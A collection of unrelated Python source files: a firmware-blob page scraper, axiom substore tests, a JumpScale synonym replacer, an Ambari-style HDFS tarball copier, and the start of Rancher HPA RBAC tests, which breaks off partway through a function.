            self._scrape_version(tag, device_desc, tree)
            self._scrape_blobs(tag, device_desc, tree)
    def version(self):
        """Return the scraped blob version (int); -1 before scraping."""
        return self._version
    def blobtable(self):
        """Return the tag -> rows table; asserts that a scrape succeeded."""
        assert self._version > 0, ("no version recorded -- "
                                   "scrape failed (or not run)")
        return self._blobtable
    def dump(self):
        """Write the scraped state out for debugging."""
        sys.stderr.write("version: %d\n" % self._version)
        for tag, rowlist in self._blobtable.items():
            print("\nDevice %s:" % tag)
            for idx, r in enumerate(rowlist):
                columns = " ".join(r)
                print("%d: %s" % (idx, columns))
    def _scrape_version(self, tag, device_desc, tree):
        """Collect the version number for the blob of interest."""
        # Pick out the h3 text itself, since we need to use a pattern match
        # to collect the version (which changes periodically)
        xpath_query_h3 = "//*[contains(text(),'%s')]" % device_desc
        heading = tree.xpath(xpath_query_h3)
        heading_text = heading[0].text
        matcher = re.compile(r"^\s*(.+)\s+\((\d+)\)\s*$")
        m = matcher.match(heading_text)
        if m is None:
            # BUG FIX: the format arguments were not parenthesized
            # ("... % tag, heading_text"), so '%' applied to 'tag' alone
            # and raised TypeError instead of reporting the error.
            u.error("internal error: h3 pattern match "
                    "failed for %s: text is %s" % (tag, heading_text))
        tagver = int(m.group(2))
        if self._version < 0:
            self._version = tagver
        elif tagver != self._version:
            # BUG FIX: the message had two %d placeholders but supplied no
            # arguments, which raised TypeError when the branch was hit.
            u.error("blobs page has unexpected multiple "
                    "versions (%d and %d) -- not sure if this matters"
                    % (self._version, tagver))
    def _scrape_blobs(self, tag, device_desc, tree):
        """Scrape blobs of interest."""
        # Scoop up the contents of the table that immediately
        # follows the heading of interest
        xpath_query_table = ("//*[contains(text(),'%s')]"
                             "/following-sibling::table[1]" % device_desc)
        table = tree.xpath(xpath_query_table)
        table_rows = table[0]
        # Skip the header row (column titles).
        interesting_rows = table_rows[1:]
        rowlist = []
        for row in interesting_rows:
            desc = row[0].text_content().strip()
            company = row[1].text_content().strip()
            # text content for the download link is just the string "Link",
            # so pull the href attribute instead.
            link_child = row[2].xpath("child::a/@href")
            link_target = link_child[0].strip()
            md5sum = row[3].text_content().strip()
            sha1sum = row[4].text_content().strip()
            columnlist = [desc, company, link_target, md5sum, sha1sum]
            rowlist.append(columnlist)
        self._blobtable[tag] = rowlist
#
#----------------------------------------------------------------------
# Main portion of script
#
# NOTE: these statements run at import time; the script has no
# "if __name__ == '__main__'" guard.
parse_args()
bscraper = NexusBlobPageScraper(flag_scrape_target, device_tags)
bscraper.doit()
postprocess(bscraper)
| |
from twisted.application.service import Service, IService
from twisted.python import filepath
from twisted.trial import unittest
from axiom.store import Store
from axiom.item import Item
from axiom.substore import SubStore
from axiom.attributes import text, bytes, boolean, inmemory
class SubStored(Item):
    # Minimal item type used as the payload stored inside substores by the
    # tests below.
    schemaVersion = 1
    typeName = 'substoredthing'
    a = text()
    b = bytes()
class YouCantStartThis(Item, Service):
    # Service-item whose startService should NOT be invoked implicitly when
    # the parent store starts (see SubStoreStartupSemantics).
    parent = inmemory()
    running = inmemory()
    name = inmemory()
    started = boolean(default=False)
    def startService(self):
        # Record that the (unexpected) start actually happened.
        self.started = True
class YouShouldStartThis(Item, Service):
    # Service-item whose startService SHOULD run once the substore item is
    # explicitly powered up as an IService (see SubStoreStartupSemantics).
    parent = inmemory()
    running = inmemory()
    name = inmemory()
    started = boolean(default=False)
    def startService(self):
        # Record that the expected start actually happened.
        self.started = True
class SubStoreTest(unittest.TestCase):
    """
    Test on-disk creation of substores.
    """
    def testOneThing(self):
        """
        Ensure that items can be inserted into substores and
        subsequently retrieved.
        """
        topdb = filepath.FilePath(self.mktemp())
        s = Store(topdb)
        ss = SubStore.createNew(s, ['account', 'bob@divmod.com'])
        s2 = ss.open()
        ssd = SubStored(store=s2, a=u'hello world', b='what, its text')
        oid = ss.storeID
        oid2 = ssd.storeID
        s2.close()
        s.close()
        # Reopen everything from disk and verify that both the substore
        # item and the item stored inside it survived the round-trip.
        reopens = Store(topdb)
        reopenss = reopens.getItemByID(oid)
        reopens2 = reopenss.open()
        reopenssd = reopens2.getItemByID(oid2)
        self.assertEquals(reopenssd.a, u'hello world')
        self.assertEquals(reopenssd.b, 'what, its text')
    def test_oneThingMemory(self):
        """
        Ensure that items put into in-memory substores are retrievable.
        """
        s = Store()
        ss = SubStore.createNew(s, ['account', 'bob@divmod.com'])
        s2 = ss.open()
        ssd = SubStored(store=s2, a=u'hello world', b='what, its text')
        oid = ss.storeID
        oid2 = ssd.storeID
        s2.close()
        # Reopening an in-memory substore must hand back the same objects.
        self.assertIdentical(s.getItemByID(oid), ss)
        self.assertIdentical(ss.open(), s2)
        item = s2.getItemByID(oid2)
        self.assertEquals(item.a, u'hello world')
        self.assertEquals(item.b, 'what, its text')
    def test_hereTodayGoneTomorrow(self):
        """
        Ensure that substores exist after closing them.
        """
        s = Store()
        ss = SubStore.createNew(s, ['account', 'bob@divmod.com'])
        s2 = ss.open()
        ssd = SubStored(store=s2, a=u'hello world', b='what, its text')
        oid = ss.storeID
        oid2 = ssd.storeID
        s2.close()
        #the following is done to mimic garbage collection of objects holding
        #on to substores
        del s2._openSubStore
        ss = s.getItemByID(oid)
        s2 = ss.open()
        item = s2.getItemByID(oid2)
        self.assertEquals(item.a, u'hello world')
        self.assertEquals(item.b, 'what, its text')
    def test_memorySubstoreFile(self):
        """
        In-memory substores whose stores have file directories should be able
        to create files.
        """
        filesdir = filepath.FilePath(self.mktemp())
        s = Store(filesdir=filesdir)
        ss = SubStore.createNew(s, ['account', 'bob@divmod.com'])
        s2 = ss.open()
        f = s2.newFile("test.txt")
        f.write("yay")
        f.close()
        # The finalized file must exist on disk with the written contents.
        self.assertEqual(open(f.finalpath.path).read(), "yay")
    def test_createNewStringPath(self):
        """
        Passing a string instead of a sequence of strings to
        L{SubStore.createNew} results in an exception.
        """
        s = Store()
        e = self.assertRaises(
            ValueError, SubStore.createNew, s, 'notasequence')
        self.assertEqual(
            e.args[0], "Received 'notasequence' instead of a sequence")
class SubStoreStartupSemantics(unittest.TestCase):
    """
    These tests verify that interactions between store and substore services
    are correct. They also provide some documentation of expected edge-case
    behavior. Read the code if you are interested in how to get startup
    notifications from substore items.
    """
    def setUp(self):
        """
        Set up the tests by creating a store and a substore and opening them
        both.
        """
        self.topdb = topdb = Store(filepath.FilePath(self.mktemp()))
        self.ssitem = ssitem = SubStore.createNew(
            topdb, ["dontstartme", "really"])
        self.ss = ssitem.open()
        # Tracks whether _startService ran so tearDown knows to stop it.
        self.serviceStarted = False
    def testDontStartNormally(self):
        """
        Substores' services are not supposed to be started when their parent
        stores are.
        """
        ss = self.ss
        ycst = YouCantStartThis(store=ss)
        ss.powerUp(ycst, IService)
        self._startService()
        self.failIf(ycst.started)
    def testStartEverythingExplicitly(self):
        """
        Substores implement IService themselves, just as regular stores do, via
        the special-case machinery.
        """
        ss = self.ss
        ysst = YouShouldStartThis(store=ss)
        ss.powerUp(ysst, IService)
        # Powering up the substore item itself is what propagates service
        # startup down into the substore.
        self.topdb.powerUp(self.ssitem, IService)
        self._startService()
        self.failUnless(ysst.started)
    def _startService(self):
        """
        Start the service and make sure we know it's started so tearDown can
        shut it down.
        """
        assert not self.serviceStarted
        self.serviceStarted = True
        return IService(self.topdb).startService()
    def tearDown(self):
        """
        Stop services that may have been started by these test cases.
        """
        if self.serviceStarted:
            return IService(self.topdb).stopService()
| |
from JumpScale import j
import re
import random
class Synonym:
    def __init__(self, name='', replaceWith='', simpleSearch="", addConfluenceLinkTags=False, replaceExclude=''):
        """
        @param name: Name of the synonym
        @param replaceWith: The replacement of simpleSearch
        @param simpleSearch: Search string that'll be replaced with replaceWith;
            a "?" inside it matches an optional " ", "-" or "_"
        @param addConfluenceLinkTags: True to also match confluence [ ] tags around the synonym
        @param replaceExclude: Regex of spans protected from replacement (see replace())
        """
        # (Doc fix: the old docstring described a @defSynonym parameter that
        # does not exist, and omitted replaceExclude.)
        self.simpleSearch = simpleSearch
        self.regexFind = ""
        self.regexFindForReplace = ""
        self.name = name
        self.replaceWith = replaceWith
        self.addConfluenceLinkTags = addConfluenceLinkTags
        self.replaceExclude = replaceExclude
        self._markers = dict()
        # Monotonic counter for building collision-free marker names.
        self._marker_seq = 0
        if simpleSearch != "":
            search = simpleSearch.replace("?", "[ -_]?")  # match " " or "-" or "_" one or 0 time
            if addConfluenceLinkTags:
                bracketMatchStart = r"(\[ *|)"
                bracketMatchStop = r"( *\]|)"
            else:
                bracketMatchStart = ""
                bracketMatchStop = ""
            self.regexFind = r"(?i)%s\b%s\b%s" % (bracketMatchStart, search.lower(), bracketMatchStop)
            self.regexFindForReplace = self.regexFind

    def setRegexSearch(self, regexFind, regexFindForReplace):
        """Switch this synonym to explicit regex search; clears simpleSearch."""
        self.regexFind = regexFind
        if regexFindForReplace == "":
            regexFindForReplace = regexFind
        self.regexFindForReplace = regexFindForReplace
        self.simpleSearch = ""

    def replace(self, text):
        """Apply this synonym to *text*, protecting replaceExclude spans."""
        if self.replaceExclude:
            # Check for any def tag that contains name "e.g: [ Q-Layer ]",
            # remove them and put markers in place
            text = self._replaceDefsWithMarkers(text)
        text = j.tools.code.regex.replace(
            regexFind=self.regexFind, regexFindsubsetToReplace=self.regexFindForReplace, replaceWith=self.replaceWith, text=text)
        if self.replaceExclude:
            # Remove the markers and put the original def tags back
            text = self._replaceMarkersWithDefs(text)
        return text

    def _replaceDefsWithMarkers(self, text):
        """
        Search for any def tags that contain the name of this synonym
        (e.g. "[Q-layer]") in text and replace each with a unique marker.
        Markers and the strings they replaced are stored in self._markers.
        """
        # patterns you don't want to be replaced
        pat = self.replaceExclude
        matches = j.tools.code.regex.findAll(pat, text)
        for match in matches:
            # BUG FIX: markers were built from random.randint(0, 1000), so
            # two protected spans could receive the same marker; the dict
            # entry was then overwritten and the first span was restored
            # with the wrong text. A per-instance counter is always unique.
            mark = "$$MARKER$$%s$$" % self._marker_seq
            self._marker_seq += 1
            self._markers[mark] = match
            match = re.escape(match)
            text = j.tools.code.regex.replace(
                regexFind=match, regexFindsubsetToReplace=match, replaceWith=mark, text=text)
        return text

    def _replaceMarkersWithDefs(self, text):
        """
        Removes markers out of text and puts the original strings back
        """
        for marker, replacement in list(self._markers.items()):
            marker = re.escape(marker)
            text = j.tools.code.regex.replace(
                regexFind=marker, regexFindsubsetToReplace=marker, replaceWith=replacement, text=text)
        return text

    def __str__(self):
        out = "name:%s simple:%s regex:%s regereplace:%s replacewith:%s\n" % (
            self.name, self.simpleSearch, self.regexFind, self.regexFindForReplace, self.replaceWith)
        return out

    def __repr__(self):
        return self.__str__()
class WordReplacer:

    def __init__(self):
        self.synonyms = []  # list of Synonym objects, applied in order by replace()

    def synonymsPrint(self):
        """Print every registered synonym, one per line."""
        for syn in self.synonyms:
            print(syn)

    def synonymAdd(self, name='', simpleSearch='', regexFind='', regexFindForReplace='',
                   replaceWith='', replaceExclude='', addConfluenceLinkTags=False):
        """
        Adds a new synonym to this replacer
        @param name: Synonym name
        @param simpleSearch: Search text for synonym; when supplied, the synonym automatically generates a matching regex pattern. Use regexFind to specify the regex explicitly instead.
        @param regexFind: Provide this regex only if you didn't provide simpleSearch; it overrides the default synonym search pattern
        @param regexFindForReplace: The subset within regexFind that'll be replaced for this synonym
        """
        synonym = Synonym(name, replaceWith, simpleSearch, addConfluenceLinkTags, replaceExclude)
        if regexFind:
            synonym.setRegexSearch(regexFind, regexFindForReplace)
        self.synonyms.append(synonym)

    def reset(self):
        """Drop all registered synonyms."""
        self.synonyms = []

    def synonymsAddFromFile(self, path, addConfluenceLinkTags=False):
        """
        load synonym statements from a file in the following format
        [searchStatement]:[replaceto]
        or
        '[regexFind]':'[regexReplace]':replaceto
        note: delimiter is :
        note: '' around regex statements
        e.g.
        ******
        master?daemon:ApplicationServer
        application?server:ApplicationServer
        'application[ -_]+server':'application[ -_]+server':ApplicationServer
        '\[application[ -_]+server\]':'application[ -_]+server':ApplicationServer
        ******
        @param addConfluenceLinkTags if True then replaced items will be surrounded by [] (Boolean)
        """
        txt = j.sal.fs.fileGetContents(path)
        for line in txt.split("\n"):
            line = line.strip()
            if line != "" and line.find(":") != -1:
                if j.tools.code.regex.match("^'", line):
                    # found line which is regex format:
                    # 'regexFind':'regexFindForReplace':replaceWith
                    splitted = line.split("'")
                    # BUG FIX: a valid regex line contains four quotes, so
                    # split("'") yields FIVE parts (['', find, ':', replace,
                    # ':to']); the old check for 4 parts rejected every valid
                    # line, and the old error message had no %s placeholder,
                    # so raising it crashed with TypeError.
                    if len(splitted) != 5:
                        raise j.exceptions.RuntimeError(
                            "syntax error in synonym line (has to be 2 'regex' statements): %s" % line)
                    # BUG FIX: use the quoted regexes (indices 1 and 3) and
                    # the text after the final ':' as the replacement; the
                    # old indices (0, 1, 2) picked up '' and ':' fragments.
                    syn = Synonym(replaceWith=splitted[4].lstrip(':').strip())
                    syn.setRegexSearch(regexFind=splitted[1], regexFindForReplace=splitted[3])
                else:
                    find = line.split(":")[0]
                    replace = line.split(":")[1].strip()
                    syn = Synonym(replaceWith=replace, simpleSearch=find, addConfluenceLinkTags=addConfluenceLinkTags)
                self.synonyms.append(syn)

    def removeConfluenceLinks(self, text):
        """
        find [...] and remove the [ and the ]
        TODO: 2 (id:19)
        """
        # Deliberately disabled: the implementation below is unfinished.
        raise j.exceptions.RuntimeError("todo needs to be done, is not working now")

        def replaceinside(matchobj):
            match = matchobj.group()
            # we found a match now
            if match.find("|") == -1:
                match = re.sub("( *\])|(\[ *)", "", match)
                toreplace = searchitem[2]
                searchregexReplace = searchitem[1]
                match = re.sub(searchregexReplace, toreplace, match)
                return match
            else:
                return match
        for searchitem in self.synonyms:
            text = re.sub(searchitem[0], replaceinside, text)
        return text

    def replace(self, text):
        """Apply every registered synonym to *text*, in registration order."""
        for syn in self.synonyms:
            text = syn.replace(text)
        return text

    def replaceInConfluence(self, text):
        """
        @[..|.] will also be looked for and replaced
        """
        def replaceinside(matchobj):
            match = matchobj.group()
            # we found a match now
            if match.find("|") == -1:
                # Strip the confluence brackets, then apply the synonym.
                match = re.sub("( *\])|(\[ *)", "", match)
                match = re.sub(syn.regexFind, syn.replaceWith, match)
                return match
            else:
                return match
        for syn in self.synonyms:
            # call function replaceinside when match
            text = re.sub(syn.regexFind, replaceinside, text)
        return text

    def _addConfluenceLinkTags(self, word):
        """
        add [ & ] to word (only when not already bracketed)
        """
        if word.find("[") == -1 and word.find("]") == -1:
            word = "[%s]" % word
        return word
| |
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Public API of this module.
__all__ = ["copy_to_hdfs", "get_sysprep_skip_copy_tarballs_hdfs"]
import os
import uuid
import tempfile
import re
from resource_management.libraries.script.script import Script
from resource_management.libraries.resources.hdfs_resource import HdfsResource
from resource_management.libraries.functions.default import default
from resource_management.core import shell
from resource_management.core.logger import Logger
from resource_management.libraries.functions import stack_tools
# Placeholder tokens substituted with runtime values by get_tarball_paths().
STACK_NAME_PATTERN = "{{ stack_name }}"
STACK_ROOT_PATTERN = "{{ stack_root }}"
STACK_VERSION_PATTERN = "{{ stack_version }}"
# TODO, in the future, each stack can define its own mapping of tarballs
# inside the stack definition directory in some sort of xml file.
# PLEASE DO NOT put this in cluster-env since it becomes much harder to change,
# especially since it is an attribute of a stack and becomes
# complicated to change during a Rolling/Express upgrade.
# Maps tarball name -> (local source path, HDFS destination path).  Both
# sides may contain the placeholder patterns defined above.
TARBALL_MAP = {
    "slider": ("{0}/{1}/slider/lib/slider.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
               "/{0}/apps/{1}/slider/slider.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
    "tez": ("{0}/{1}/tez/lib/tez.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
            "/{0}/apps/{1}/tez/tez.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
    "tez_hive2": ("{0}/{1}/tez_hive2/lib/tez.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
                  "/{0}/apps/{1}/tez_hive2/tez.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
    "hive": ("{0}/{1}/hive/hive.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
             "/{0}/apps/{1}/hive/hive.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
    "pig": ("{0}/{1}/pig/pig.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
            "/{0}/apps/{1}/pig/pig.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
    "hadoop_streaming": ("{0}/{1}/hadoop-mapreduce/hadoop-streaming.jar".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
                         "/{0}/apps/{1}/mapreduce/hadoop-streaming.jar".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
    "sqoop": ("{0}/{1}/sqoop/sqoop.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
              "/{0}/apps/{1}/sqoop/sqoop.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
    "mapreduce": ("{0}/{1}/hadoop/mapreduce.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
                  "/{0}/apps/{1}/mapreduce/mapreduce.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
    "spark": ("{0}/{1}/spark/lib/spark-{2}-assembly.jar".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN, STACK_NAME_PATTERN),
              "/{0}/apps/{1}/spark/spark-{0}-assembly.jar".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
    "spark2": ("/tmp/spark2/spark2-{0}-yarn-archive.tar.gz".format(STACK_NAME_PATTERN),
               "/{0}/apps/{1}/spark2/spark2-{0}-yarn-archive.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN))
}
# Fixed source/destination paths used when the stack is "ADH"; no
# placeholder substitution is performed for these entries.
TARBALL_ADH_MAP = {
    "tez": ("/usr/lib/tez/share/tez.tar.gz", "/apps/tez/tez.tar.gz"),
    "spark2": ("/tmp/spark2/spark2-{0}-yarn-archive.tar.gz".format('ADH'),
               "/apps/spark2/jars/spark2-{0}-yarn-archive.tar.gz".format('ADH')),
    "tez_hive2": ("/usr/lib/tez/share/tez.tar.gz", "/apps/tez/tez.tar.gz"),
    "hive": ("/usr/lib/hive/hive.tar.gz", "/apps/hive/hive.tar.gz"),
    "pig": ("/usr/lib/pig/pig.tar.gz", "/apps/pig/pig.tar.gz"),
    "mapreduce": ("/usr/lib/hadoop/mapreduce.tar.gz", "/apps/mapreduce/mapreduce.tar.gz"),
    "sqoop": ("/usr/lib/sqoop/sqoop.tar.gz", "/apps/sqoop/sqoop.tar.gz"),
    "hadoop_streaming": ("/usr/lib/hadoop-mapreduce/hadoop-streaming.jar", "/apps/mapreduce/hadoop-streaming.jar")
}
def get_sysprep_skip_copy_tarballs_hdfs():
    """Return True when a sysprepped host is configured to skip copying
    tarballs to HDFS; False in every other case."""
    import params
    # Non-sysprepped hosts always copy the tarballs.
    if not default("/hostLevelParams/host_sys_prepped", False):
        return False
    # Sysprepped: honor the cluster-env override (defaults to copying).
    return default("/configurations/cluster-env/sysprep_skip_copy_tarballs_hdfs", False)
def adh_tarball_paths(name):
    """Look up *name* in TARBALL_ADH_MAP.

    :return: (True, source, dest) on success, (False, None, None) otherwise.
    """
    key = name.lower()
    if key not in TARBALL_ADH_MAP:
        Logger.error("Cannot copy {0} tarball to HDFS because missing key in TARBALL_ADH_MAP.".format(str(name)))
        return (False, None, None)
    source_file, dest_file = TARBALL_ADH_MAP[key]
    return (True, source_file, dest_file)
def get_tarball_paths(name, use_upgrading_version_during_upgrade=True, custom_source_file=None, custom_dest_file=None):
    """
    For a given tarball name, get the source and destination paths to use.
    :param name: Tarball name
    :param use_upgrading_version_during_upgrade: True to substitute the version being upgraded to; False to keep the current one.
    :param custom_source_file: If specified, use this source path instead of the default one from the map.
    :param custom_dest_file: If specified, use this destination path instead of the default one from the map.
    :return: A tuple of (success status, source path, destination path)
    """
    stack_name = Script.get_stack_name()
    if not stack_name:
        Logger.error("Cannot copy {0} tarball to HDFS because stack name could not be determined.".format(str(name)))
        return (False, None, None)
    # ADH uses fixed paths and needs no placeholder substitution.
    if stack_name == "ADH":
        return adh_tarball_paths(name)
    stack_version = get_current_version(use_upgrading_version_during_upgrade)
    if not stack_version:
        # BUGFIX: message previously read "could be be determined".
        Logger.error("Cannot copy {0} tarball to HDFS because stack version could not be determined.".format(str(name)))
        return (False, None, None)
    stack_root = Script.get_stack_root()
    if not stack_root:
        # BUGFIX: message previously read "could be be determined".
        Logger.error("Cannot copy {0} tarball to HDFS because stack root could not be determined.".format(str(name)))
        return (False, None, None)
    if name is None or name.lower() not in TARBALL_MAP:
        Logger.error("Cannot copy tarball to HDFS because {0} is not supported in stack {1} for this operation.".format(str(name), str(stack_name)))
        return (False, None, None)
    (source_file, dest_file) = TARBALL_MAP[name.lower()]
    if custom_source_file is not None:
        source_file = custom_source_file
    if custom_dest_file is not None:
        dest_file = custom_dest_file
    # Substitute runtime values for the placeholder patterns on both paths.
    source_file = source_file.replace(STACK_NAME_PATTERN, stack_name.lower())
    dest_file = dest_file.replace(STACK_NAME_PATTERN, stack_name.lower())
    source_file = source_file.replace(STACK_ROOT_PATTERN, stack_root.lower())
    dest_file = dest_file.replace(STACK_ROOT_PATTERN, stack_root.lower())
    source_file = source_file.replace(STACK_VERSION_PATTERN, stack_version)
    dest_file = dest_file.replace(STACK_VERSION_PATTERN, stack_version)
    return (True, source_file, dest_file)
def get_current_version(use_upgrading_version_during_upgrade=True):
    """
    Get the effective version to use to copy the tarballs to.
    :param use_upgrading_version_during_upgrade: True, except when the RU/EU hasn't started yet.
    :return: Version, or False if an error occurred.
    """
    upgrade_direction = default("/commandParams/upgrade_direction", None)
    is_stack_upgrade = upgrade_direction is not None
    current_version = default("/hostLevelParams/current_version", None)
    Logger.info("Default version is {0}".format(current_version))
    if is_stack_upgrade:
        if use_upgrading_version_during_upgrade:
            # This is the version going to. In the case of a downgrade, it is the lower version.
            current_version = default("/commandParams/version", None)
            Logger.info("Because this is a Stack Upgrade, will use version {0}".format(current_version))
        else:
            Logger.info("This is a Stack Upgrade, but keep the version unchanged.")
    elif current_version is None:
        # During normal operation, the first installation of services won't yet know about the version, so must rely
        # on <stack-selector> to get it.
        stack_version = _get_single_version_from_stack_select()
        if stack_version:
            Logger.info("Will use stack version {0}".format(stack_version))
            current_version = stack_version
    if current_version is None:
        message_suffix = "during stack %s" % str(upgrade_direction) if is_stack_upgrade else ""
        Logger.warning("Cannot copy tarball because unable to determine current version {0}.".format(message_suffix))
        return False
    return current_version
def _get_single_version_from_stack_select():
    """
    Call "<stack-selector> versions" and return the version string if only one version is available.
    :return: Returns a version string if successful, and None otherwise.
    """
    # Ubuntu returns: "stdin: is not a tty", as subprocess output, so must use a temporary file to store the output.
    # BUGFIX: removed an unused ``tempfile.NamedTemporaryFile()`` that leaked
    # an open file handle on every call.
    tmp_dir = Script.get_tmp_dir()
    tmp_file = os.path.join(tmp_dir, "copy_tarball_out.txt")
    stack_version = None
    out = None
    # BUGFIX: pre-initialize so the check below cannot raise NameError when
    # shell.call itself throws before assigning ``code``.
    code = -1
    stack_selector_path = stack_tools.get_stack_tool_path(stack_tools.STACK_SELECTOR_NAME)
    get_stack_versions_cmd = "{0} versions > {1}".format(stack_selector_path, tmp_file)
    try:
        code, stdoutdata = shell.call(get_stack_versions_cmd, logoutput=True)
        # ``as e`` / ``f`` instead of the old comma form and the shadowed
        # builtin ``file``; works on Python 2.6+ and 3.
        with open(tmp_file, 'r+') as f:
            out = f.read()
    except Exception as e:
        Logger.logger.exception("Could not parse output of {0}. Error: {1}".format(str(tmp_file), str(e)))
    finally:
        try:
            if os.path.exists(tmp_file):
                os.remove(tmp_file)
        except Exception as e:
            Logger.logger.exception("Could not remove file {0}. Error: {1}".format(str(tmp_file), str(e)))
    if code != 0 or out is None or out == "":
        Logger.error("Could not verify stack version by calling '{0}'. Return Code: {1}, Output: {2}.".format(get_stack_versions_cmd, str(code), str(out)))
        return None
    # Accept dotted versions with an optional "-<build>" suffix.
    matches = re.findall(r"([\d\.]+(?:-\d+)?)", out)
    if matches and len(matches) == 1:
        stack_version = matches[0]
    elif matches and len(matches) > 1:
        Logger.error("Found multiple matches for stack version, cannot identify the correct one from: {0}".format(", ".join(matches)))
    return stack_version
def copy_to_hdfs(name, user_group, owner, file_mode=0o444, custom_source_file=None, custom_dest_file=None, force_execute=False,
                 use_upgrading_version_during_upgrade=True, replace_existing_files=False, skip=False):
    """
    Copy the named tarball from the local filesystem into HDFS.
    :param name: Tarball name, e.g., tez, hive, pig, sqoop.
    :param user_group: Group to own the directory.
    :param owner: File owner
    :param file_mode: File permission
    :param custom_source_file: Override the source file path
    :param custom_dest_file: Override the destination file path
    :param force_execute: If true, will execute the HDFS commands immediately, otherwise, will defer to the calling function.
    :param use_upgrading_version_during_upgrade: If true, will use the version going to during upgrade. Otherwise, use the CURRENT (source) version.
    :param replace_existing_files: If true, overwrite the destination file even if it already exists.
    :param skip: If true, tarballs will not be copied as the cluster deployment uses prepped VMs.
    :return: Will return True if successful, otherwise, False.
    """
    import params
    Logger.info("Called copy_to_hdfs tarball: {0}".format(name))
    (success, source_file, dest_file) = get_tarball_paths(name, use_upgrading_version_during_upgrade,
                                                          custom_source_file, custom_dest_file)
    if not success:
        Logger.error("Could not copy tarball {0} due to a missing or incorrect parameter.".format(str(name)))
        return False
    if skip:
        Logger.warning("Skipping copying {0} to {1} for {2} as it is a sys prepped host.".format(str(source_file), str(dest_file), str(name)))
        return True
    Logger.info("Source file: {0} , Dest file in HDFS: {1}".format(source_file, dest_file))
    if not os.path.exists(source_file):
        Logger.error("WARNING. Cannot copy {0} tarball because file does not exist: {1} . "
                     "It is possible that this component is not installed on this host.".format(str(name), str(source_file)))
        return False
    # Because CopyFromLocal does not guarantee synchronization, it's possible for two processes to first attempt to
    # copy the file to a temporary location, then process 2 fails because the temporary file was already created by
    # process 1, so process 2 tries to clean up by deleting the temporary file, and then process 1
    # cannot finish the copy to the final destination, and both fail!
    # For this reason, the file name on the destination must be unique, and we then rename it to the intended value.
    # The rename operation is synchronized by the Namenode.
    #unique_string = str(uuid.uuid4())[:8]
    #temp_dest_file = dest_file + "." + unique_string
    # The logic above cannot be used until fast-hdfs-resource.jar supports the mv command, or it switches
    # to WebHDFS.
    # If the directory already exists, it is a NO-OP
    dest_dir = os.path.dirname(dest_file)
    params.HdfsResource(dest_dir,
                        type="directory",
                        action="create_on_execute",
                        owner=owner,
                        mode=0o555
                        )
    # If the file already exists, it is a NO-OP
    params.HdfsResource(dest_file,
                        type="file",
                        action="create_on_execute",
                        source=source_file,
                        group=user_group,
                        owner=owner,
                        # BUGFIX: honor the file_mode parameter; it was
                        # accepted but ignored (mode was hard-coded 0444).
                        mode=file_mode,
                        replace_existing_files=replace_existing_files,
                        )
    Logger.info("Will attempt to copy {0} tarball from {1} to DFS at {2}.".format(name, source_file, dest_file))
    # For improved performance, force_execute should be False so that it is delayed and combined with other calls.
    # If still want to run the command now, set force_execute to True
    if force_execute:
        params.HdfsResource(None, action="execute")
    return True
| |
import pytest
from rancher import ApiError
from .common import * # NOQA
# Shared fixture state, populated once per module by create_project_client().
namespace = {"p_client": None, "ns": None, "cluster": None, "project": None}
def test_create_hpa():
    """Creating an HPA plus its backing workload in the shared namespace
    should succeed; clean both up afterwards."""
    client = namespace["p_client"]
    target_ns = namespace["ns"]
    hpa, workload = create_hpa(client, target_ns)
    client.delete(hpa, workload)
def test_edit_hpa():
    """Editing an existing HPA should succeed; clean up afterwards."""
    client = namespace["p_client"]
    target_ns = namespace["ns"]
    hpa, workload = edit_hpa(client, target_ns)
    client.delete(hpa, workload)
def test_delete_hpa():
    """An HPA can be deleted and its removal is verified by delete_hpa()."""
    client = namespace["p_client"]
    target_ns = namespace["ns"]
    hpa, workload = create_hpa(client, target_ns)
    delete_hpa(client, hpa, target_ns)
    client.delete(workload)
# Roles exercised by the parametrized RBAC tests below.
rbac_role_list = [
    (CLUSTER_OWNER),
    (PROJECT_OWNER),
    (PROJECT_MEMBER),
    (PROJECT_READ_ONLY),
    (CLUSTER_MEMBER),
]
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_create(role, remove_resource):
    """Roles with write access can create HPA objects.

    Cluster members get a dedicated project (they cannot see the shared
    one); read-only members must receive 403 Forbidden.
    """
    user_project = None
    if(role == CLUSTER_MEMBER):
        user_token = rbac_get_user_token_by_role(CLUSTER_MEMBER)
        user_project, ns = create_project_and_ns(user_token,
                                                 namespace["cluster"],
                                                 random_test_name(
                                                     "cluster-mem"))
        p_client = get_project_client_for_token(user_project, user_token)
    else:
        user_token = rbac_get_user_token_by_role(role)
        project = rbac_get_project()
        ns = rbac_get_namespace()
        p_client = get_project_client_for_token(project, user_token)
    if (role != PROJECT_READ_ONLY):
        newhpa, newworkload = create_hpa(p_client, ns)
